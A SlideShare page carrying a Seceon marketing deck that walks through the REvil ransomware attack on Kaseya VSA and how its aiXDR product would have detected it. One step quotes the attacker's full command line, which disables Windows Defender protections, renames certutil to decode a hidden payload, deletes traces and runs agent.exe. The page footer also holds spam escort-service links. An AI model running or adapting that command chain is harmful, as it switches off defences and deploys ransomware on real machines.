SlideShare a Scribd company logo

How Seceon could have stopped the Ransomware roll over Kaseya.pptx

Download as PPTX, PDF
CompanySeceon
CompanySeceon

Kaseya has been completely forced to shut down their cloud infrastructure to stop malicious updates from spreading and they completely advised their customer to power down their servers and that’s created a lot of chaos. Call Us: +1 (978)-923-0040

Business
1 of 7
How Seceon could have stopped the Ransomware roll over Kaseya. The attack and ways will keep on changing, one of the most Recent attack that Kaseya faced is the result of what & where industry is missing in terms of Cybersecurity. The attack on Kaseya came in action a few days ago. The sudden attack emerged in a brutal way infecting around 1500 businesses worldwide as per the statement by Kaseya’s CEO. The names of infected companies are not yet out. The observed result of this attackswas seen with Swedish Coop supermarket which was forced to close. They are among one of the clients of these MSPs which were hacked and got infected with 2100 endpoints.
A $70 millions ransom was demanded for data backup. The REvil Ransomware gang is being considered responsible for this operation. It’s still a mystery whether REvil prepared this attack themselves or it was from any of their associates. Kaseya has been completely forced to shut down their cloud infrastructure to stop malicious updates from spreading and they completely advised their customer to power down their servers and that’s created a lot of chaos. What is VSA, How it got compromised and Ransomware rolled over it.. VSA is a remote monitoring tool, a kind of remote access tool or RAT that allows to have the complete access of system or device it’s installed on, which helps IT Technicians to diagnose and fix problems remotely. Every organization doesn’t have resources to manage their infrastructure in house, so they outsource this as a task to MSP (Managed Service Provider). These MSPs often manage the system of hundreds of companies simultaneously. Kaseya is an MSP provider with VSA as a product it has its own prem version, which is run by the customer in their environment, this is typically needed by MSPs to manage all their client system and this was something that was off with Kaseya server that was used to manage lot of their clients. Having the access of this server will itself allow it to have the access of all clients associated with it. And this how it was compromised at initial. Soon after the attack rolled out all the VSA Server were advised to close. The operation was huge enough to infect the business, it was the mass ransomware unlike the ransomware that we know usually where organizations get infected with Ransomware and all system they get encrypt and are ask for ransom, here case was quite different where 100’s of organization around the world got encrypted simultaneously with the same ransomware campaign which was tunnelled during the software update in Kaseya, since from the inception it moved in a supply chain attack. It was a kind of compromise of Kaseya which was operated on VSA
server rather than any of their directory directly that we usually see in Ransomware. The VSA server was used to ransomware a lot of organizations in single click and this is what has happened at high level in it. How does it propagate? The scenario is like If there is a device using Kaseya’s agent to monitor all the device subjected to policy and that is connected to central server and that server is affected then the entire system connected with it is at higher risk, and this is how it propagated in the form of chain attack one after the other and affected 1000s of server. How did the initial compromise begin and aiXDR detection? As VSA server vulnerability was exploited, Seceon aiXDR can detect and remediate exploited vulnerabilities and zero day attack in very early stages. Here is the steps by steps analysis: 1.aiXDR monitors all inbound and outbound connections and in this case aiXDR should have detected a connection from Blacklisted IPs or from a prohibited country and automatically blocked that connection. 2.Once connection was made it was trying to download/upload agent.exe on the host , aiXDR can detect data exfiltration and in this case aiXDR should have blocked that connection so it can not download the agent.exe or transfers the data to external hosts. 3.Also when the host had agent.exe downloaded, it was doing a different type of scan to get access to another host – aiXDR should have detected those scans and automatically quarantined that host so it can not infect other hosts. 4.Following PowerShell command was launched by the C:Program Files (x86)Kaseya<ID>AgentMon.exe file of the Kaseya VSA platform. “C:WINDOWSsystem32cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set- MpPreference
-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe 5.As the AgentMon.exe starts its 1st process to execute the powershell command the aiXDR would have detected a new process started as AgentMon.exe from C:Program Files (x86)Kaseya 6.aiXDR detects if any protection service is disabled on the host as we can see in this case they were trying to disable protection services 7.aiXDR detects if any process is renamed as Masquerading as we can see in this case certutil.exe was renamed as cert.exe . What was the impact of this? The threat actor was able to manage execution of code that enabled them to search scripts that linked with Kaseya’s application to pull out certain procedures or agent updates. It was part of the functionality of the application to push out procedures through all managed agents. These agents run on the computer which is managed by this solution. They simply run the script to all managed clients and that triggered a file copy and execution of script to all managed clients. This is how they ended by infecting all these systems. There were a couple of steps that were initiated step by step to make a complete successful attempt for attack but surprisingly it was never looked at and detected in between.
Approach after Infected ? There are always different indicators left on the system to know how it’s being compromised or not, here in this case it has been identified that logs have been cleared at multiple stages. The logs were gone and other types of logs inside the application database itself were deleted but still some logs were there to know what VSA server has put out to manage clients. These logs became a point to bring out the investigation of how the system was targeted from the VSA server. Few indications of Being Ransomware. Ransomware is coming out as a complete business model and the threat actors are making a lot of money out of it. Below are few indications mentioned below: • All files in the system get encrypted and left with a README file saying about ransom amount. It will change the file extension which is a clear indication of attack occurrence. • Some of the files they may or may not get encrypted this happen in the case where ransomware did not execute successfully i.e it gets executed partially. • Provisional execution that disables antivirus functionality such as Windows defender or other security layers. Brief About Seceon aiXDR Seceon aiXDR is highly effective, enriched with capability of machine learning, AI, Big data, Dynamic threat intel, strong correlation and in-depth analysis which easily allows to cut & throw the threat roots at very initial stage. The solution detects the threat origin whether it’s coming from Network, application, host or machine learning. It comes out with one of the most interesting feature to show anything and everything that was done to make the attack attempt and how Seceon solution stopped the way in between to make the
... environment secure with 360 degree Comprehensive visibility, Proactive Threat Detection, Auto stopping of Threat and breaches in Real time. The customer should always make sure that they are not just taking a solution which is problem specific, the solution should always be capable of saving the environment from all kinds of threat and malicious activity whether it is known or unknown. The Seceon aiXDR is a single all-in-one platform. That helps to eliminate the use of silos based solutions and delivers the effective essential result in Comprehensive manner. Diag. show the Seceon aiXDR approach “Continuous real-time Monitoring, proactive Detection & auto Stop threats and breaches” Best Cybersecurity ROI.
Contact Us Address -238 Littleton Road, Suite #206,Westford, MA 01886, USA Phone Number - +1 (978)-923-0040 Email Id - sales@seceon.com , info@seceon.com Website - https://www.seceon.com/ Twitter - https://twitter.com/Seceon_Inc

Recommended

Advanced Threats in the Enterprise: Finding an Evil in the Haystack
Advanced Threats in the Enterprise: Finding an Evil in the HaystackAdvanced Threats in the Enterprise: Finding an Evil in the Haystack
Advanced Threats in the Enterprise: Finding an Evil in the HaystackEMC
 
Vulnerability Malware And Risk
Vulnerability Malware And RiskVulnerability Malware And Risk
Vulnerability Malware And RiskChandrashekhar B
 
Vulnerability , Malware and Risk
Vulnerability , Malware and RiskVulnerability , Malware and Risk
Vulnerability , Malware and RiskSecPod Technologies
 
Escan advisory wannacry ransomware
Escan advisory wannacry ransomwareEscan advisory wannacry ransomware
Escan advisory wannacry ransomwareMicroWorld Software Services Pvt Ltd
 
Are ransomware attacks the problem for web hosting firms?
Are ransomware attacks the problem for web hosting firms?Are ransomware attacks the problem for web hosting firms?
Are ransomware attacks the problem for web hosting firms?ahanashrin
 
OSB120 Beat Ransomware
OSB120 Beat RansomwareOSB120 Beat Ransomware
OSB120 Beat RansomwareIvanti
 
Presentatie McAfee: Optimale Endpoint Protection 26062015
Presentatie McAfee: Optimale Endpoint Protection 26062015Presentatie McAfee: Optimale Endpoint Protection 26062015
Presentatie McAfee: Optimale Endpoint Protection 26062015SLBdiensten
 
Web Security.pptx
Web Security.pptxWeb Security.pptx
Web Security.pptxAnnMichelleDiaz
 

Recommended

Advanced Threats in the Enterprise: Finding an Evil in the Haystack
Advanced Threats in the Enterprise: Finding an Evil in the HaystackAdvanced Threats in the Enterprise: Finding an Evil in the Haystack
Advanced Threats in the Enterprise: Finding an Evil in the HaystackEMC
 
Vulnerability Malware And Risk
Vulnerability Malware And RiskVulnerability Malware And Risk
Vulnerability Malware And RiskChandrashekhar B
 
Vulnerability , Malware and Risk
Vulnerability , Malware and RiskVulnerability , Malware and Risk
Vulnerability , Malware and RiskSecPod Technologies
 
Escan advisory wannacry ransomware
Escan advisory wannacry ransomwareEscan advisory wannacry ransomware
Escan advisory wannacry ransomwareMicroWorld Software Services Pvt Ltd
 
Are ransomware attacks the problem for web hosting firms?
Are ransomware attacks the problem for web hosting firms?Are ransomware attacks the problem for web hosting firms?
Are ransomware attacks the problem for web hosting firms?ahanashrin
 
OSB120 Beat Ransomware
OSB120 Beat RansomwareOSB120 Beat Ransomware
OSB120 Beat RansomwareIvanti
 
Presentatie McAfee: Optimale Endpoint Protection 26062015
Presentatie McAfee: Optimale Endpoint Protection 26062015Presentatie McAfee: Optimale Endpoint Protection 26062015
Presentatie McAfee: Optimale Endpoint Protection 26062015SLBdiensten
 
Web Security.pptx
Web Security.pptxWeb Security.pptx
Web Security.pptxAnnMichelleDiaz
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | SysforeYour Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | SysforeSysfore Technologies
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesBunmi Sowande
 
What is ransomware?
What is ransomware?What is ransomware?
What is ransomware?Milan Santana
 
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondLessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondAPNIC
 
Attacking antivirus
Attacking antivirusAttacking antivirus
Attacking antivirusUltraUploader
 
Proactive Security That Works
Proactive Security That WorksProactive Security That Works
Proactive Security That WorksBrett L. Scott
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareShan Kumar
 
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptxOverview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptxCompanySeceon
 
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...Orbid
 
Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...Osama Salah
 
Security threats explained
Security threats explained Security threats explained
Security threats explained Abhijeet Karve
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesAvinash Sinha
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile AttackIRJET Journal
 
Iaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threadsIaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threadsIaetsd Iaetsd
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious CodeSatria Ady Pradana
 
NetWitness
NetWitnessNetWitness
NetWitnessTechBiz Forense Digital
 
Globally.docx
Globally.docxGlobally.docx
Globally.docxGermanERuizCorrales
 
Best Open Threat Management Platform in USA
Best Open Threat Management Platform in USABest Open Threat Management Platform in USA
Best Open Threat Management Platform in USACompanySeceon
 
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptxSeceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptxCompanySeceon
 

More Related Content

Similar to How Seceon could have stopped the Ransomware roll over Kaseya.pptx

VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | SysforeYour Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | SysforeSysfore Technologies
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesBunmi Sowande
 
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondLessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondAPNIC
 
Proactive Security That Works
Proactive Security That WorksProactive Security That Works
Proactive Security That WorksBrett L. Scott
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareShan Kumar
 
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptxOverview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptxCompanySeceon
 
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...Orbid
 
Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...Osama Salah
 
Security threats explained
Security threats explained Security threats explained
Security threats explained Abhijeet Karve
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesAvinash Sinha
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile AttackIRJET Journal
 
Iaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threadsIaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threadsIaetsd Iaetsd
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious CodeSatria Ady Pradana
 

Similar to How Seceon could have stopped the Ransomware roll over Kaseya.pptx (20)

VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | SysforeYour Guide to tackle the Ransomware threat "WannaCry" | Sysfore
Your Guide to tackle the Ransomware threat "WannaCry" | Sysfore
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software Vulnerabilities
 
What is ransomware?
What is ransomware?What is ransomware?
What is ransomware?
 
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondLessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
 
Attacking antivirus
Attacking antivirusAttacking antivirus
Attacking antivirus
 
Proactive Security That Works
Proactive Security That WorksProactive Security That Works
Proactive Security That Works
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_Spyware
 
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptxOverview of Ransomware Solutions from Protection to Detection and Response.pptx
Overview of Ransomware Solutions from Protection to Detection and Response.pptx
 
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
 
Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...Application Whitelisting - Complementing Threat centric with Trust centric se...
Application Whitelisting - Complementing Threat centric with Trust centric se...
 
Security threats explained
Security threats explained Security threats explained
Security threats explained
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation Techniques
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile Attack
 
Iaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threadsIaetsd evasive security using ac ls on threads
Iaetsd evasive security using ac ls on threads
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code
 
NetWitness
NetWitnessNetWitness
NetWitness
 
Globally.docx
Globally.docxGlobally.docx
Globally.docx
 

More from CompanySeceon

Best Open Threat Management Platform in USA
Best Open Threat Management Platform in USABest Open Threat Management Platform in USA
Best Open Threat Management Platform in USACompanySeceon
 
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptxSeceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptxCompanySeceon
 
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptxThe Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptxCompanySeceon
 
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptxSeceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptxCompanySeceon
 
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptxCompanySeceon
 
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptxThe Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptxCompanySeceon
 
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptxLearnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptxCompanySeceon
 
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptxSeceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptxCompanySeceon
 
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptxSeceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptxCompanySeceon
 
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptxSeceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptxCompanySeceon
 
XDR and Zero-Trust Strategy.pptx
XDR and Zero-Trust Strategy.pptxXDR and Zero-Trust Strategy.pptx
XDR and Zero-Trust Strategy.pptxCompanySeceon
 
Threat Intelligen.pptx
Threat Intelligen.pptxThreat Intelligen.pptx
Threat Intelligen.pptxCompanySeceon
 
Cyber Security Solutions.pptx
Cyber Security Solutions.pptxCyber Security Solutions.pptx
Cyber Security Solutions.pptxCompanySeceon
 
Threat Detection and Response.pptx
Threat Detection and Response.pptxThreat Detection and Response.pptx
Threat Detection and Response.pptxCompanySeceon
 
What is Ransomware Detection - Seceon.pptx
What is Ransomware Detection - Seceon.pptxWhat is Ransomware Detection - Seceon.pptx
What is Ransomware Detection - Seceon.pptxCompanySeceon
 
What is Ransomware Detection - Seceon.pdf
What is Ransomware Detection - Seceon.pdfWhat is Ransomware Detection - Seceon.pdf
What is Ransomware Detection - Seceon.pdfCompanySeceon
 
Top Cybersecurity Specialist Company in USA.pptx
Top Cybersecurity Specialist Company in USA.pptxTop Cybersecurity Specialist Company in USA.pptx
Top Cybersecurity Specialist Company in USA.pptxCompanySeceon
 
Open Threat Management Platform in USA.pptx
Open Threat Management Platform in USA.pptxOpen Threat Management Platform in USA.pptx
Open Threat Management Platform in USA.pptxCompanySeceon
 
Cyber Security Company.pptx
Cyber Security Company.pptxCyber Security Company.pptx
Cyber Security Company.pptxCompanySeceon
 
Ransomware Detection Company in USA.pptx
Ransomware Detection Company in USA.pptxRansomware Detection Company in USA.pptx
Ransomware Detection Company in USA.pptxCompanySeceon
 

More from CompanySeceon (20)

Best Open Threat Management Platform in USA
Best Open Threat Management Platform in USABest Open Threat Management Platform in USA
Best Open Threat Management Platform in USA
 
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptxSeceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
Seceon-Case-Study-Smart-Government-Cybersecurity (1).pptx
 
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptxThe Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
The Ultimate List of Cybersecurity Events and Conferences in 2024 - Seceon.pptx
 
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptxSeceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
Seceon Innovations in 2023 - A Look Back on a Big Year - Seceon.pptx
 
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
[Infographic] The MSP Journey to AI_ML-Powered Detection and Response.pptx
 
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptxThe Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
The Ultimate List of 2024’s Top 23 MSP and MSSP Events.pptx
 
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptxLearnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
Learnings from the IDC South Africa CIO Summit 2023 #IDSACIO (1).pptx
 
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptxSeceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
Seceon's aiXDR_ Automating Cybersecurity Threat Detection in 2023 - Seceon.pptx
 
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptxSeceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
Seceon 2023 Cybersecurity Predictions by Seceon Thought Leadership - Seceon.pptx
 
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptxSeceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
 
XDR and Zero-Trust Strategy.pptx
XDR and Zero-Trust Strategy.pptxXDR and Zero-Trust Strategy.pptx
XDR and Zero-Trust Strategy.pptx
 
Threat Intelligen.pptx
Threat Intelligen.pptxThreat Intelligen.pptx
Threat Intelligen.pptx
 
Cyber Security Solutions.pptx
Cyber Security Solutions.pptxCyber Security Solutions.pptx
Cyber Security Solutions.pptx
 
Threat Detection and Response.pptx
Threat Detection and Response.pptxThreat Detection and Response.pptx
Threat Detection and Response.pptx
 
What is Ransomware Detection - Seceon.pptx
What is Ransomware Detection - Seceon.pptxWhat is Ransomware Detection - Seceon.pptx
What is Ransomware Detection - Seceon.pptx
 
What is Ransomware Detection - Seceon.pdf
What is Ransomware Detection - Seceon.pdfWhat is Ransomware Detection - Seceon.pdf
What is Ransomware Detection - Seceon.pdf
 
Top Cybersecurity Specialist Company in USA.pptx
Top Cybersecurity Specialist Company in USA.pptxTop Cybersecurity Specialist Company in USA.pptx
Top Cybersecurity Specialist Company in USA.pptx
 
Open Threat Management Platform in USA.pptx
Open Threat Management Platform in USA.pptxOpen Threat Management Platform in USA.pptx
Open Threat Management Platform in USA.pptx
 
Cyber Security Company.pptx
Cyber Security Company.pptxCyber Security Company.pptx
Cyber Security Company.pptx
 
Ransomware Detection Company in USA.pptx
Ransomware Detection Company in USA.pptxRansomware Detection Company in USA.pptx
Ransomware Detection Company in USA.pptx
 

Recently uploaded

Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Dipal Arora
 
MONA 98765-12871 CALL GIRLS IN LUDHIANA LUDHIANA CALL GIRL
MONA 98765-12871 CALL GIRLS IN LUDHIANA LUDHIANA CALL GIRLMONA 98765-12871 CALL GIRLS IN LUDHIANA LUDHIANA CALL GIRL
MONA 98765-12871 CALL GIRLS IN LUDHIANA LUDHIANA CALL GIRLSeo
 
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...noida100girls
 
Vip Dewas Call Girls #9907093804 Contact Number Escorts Service Dewas
Vip Dewas Call Girls #9907093804 Contact Number Escorts Service DewasVip Dewas Call Girls #9907093804 Contact Number Escorts Service Dewas
Vip Dewas Call Girls #9907093804 Contact Number Escorts Service Dewasmakika9823
 
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation SlidesKeppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation SlidesKeppelCorporation
 
Progress Report - Oracle Database Analyst Summit
Progress Report - Oracle Database Analyst SummitProgress Report - Oracle Database Analyst Summit
Progress Report - Oracle Database Analyst SummitHolger Mueller
 
7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...Paul Menig
 
VIP Call Girls In Saharaganj ( Lucknow ) 🔝 8923113531 🔝 Cash Payment (COD) 👒
VIP Call Girls In Saharaganj ( Lucknow ) 🔝 8923113531 🔝 Cash Payment (COD) 👒VIP Call Girls In Saharaganj ( Lucknow ) 🔝 8923113531 🔝 Cash Payment (COD) 👒
VIP Call Girls In Saharaganj ( Lucknow ) 🔝 8923113531 🔝 Cash Payment (COD) 👒anilsa9823
 
Grateful 7 speech thanking everyone that has helped.pdf
Grateful 7 speech thanking everyone that has helped.pdfGrateful 7 speech thanking everyone that has helped.pdf
Grateful 7 speech thanking everyone that has helped.pdfPaul Menig
 
RE Capital's Visionary Leadership under Newman Leech
